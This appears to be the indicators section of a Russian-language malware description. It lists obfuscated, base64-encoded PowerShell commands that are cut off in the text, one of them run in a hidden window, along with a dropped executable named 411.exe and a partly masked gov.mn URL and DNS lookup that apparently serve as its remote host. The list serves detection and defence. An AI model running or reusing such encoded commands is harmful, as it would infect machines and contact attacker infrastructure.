Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AGUAYQBkAHYAZQBhAGYAbABhAGUAcwBtAG8AbwBtAD0AJwBsAGEAbwBiACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAdQBgAFIASQBUAGAAeQBQAFIAbwB0AE8AYABDAE...
- %HOMEPATH%\411.exe
- http://kh###.cd.gov.mn/cgi-bin/G/
- DNS ASK kh###.cd.gov.mn
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AGUAYQBkAHYAZQBhAGYAbABhAGUAcwBtAG8AbwBtAD0AJwBsAGEAbwBiACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAdQBgAFIASQBUAGAAeQBQAFIAbwB0AE8AYABDAE...' (со скрытым окном)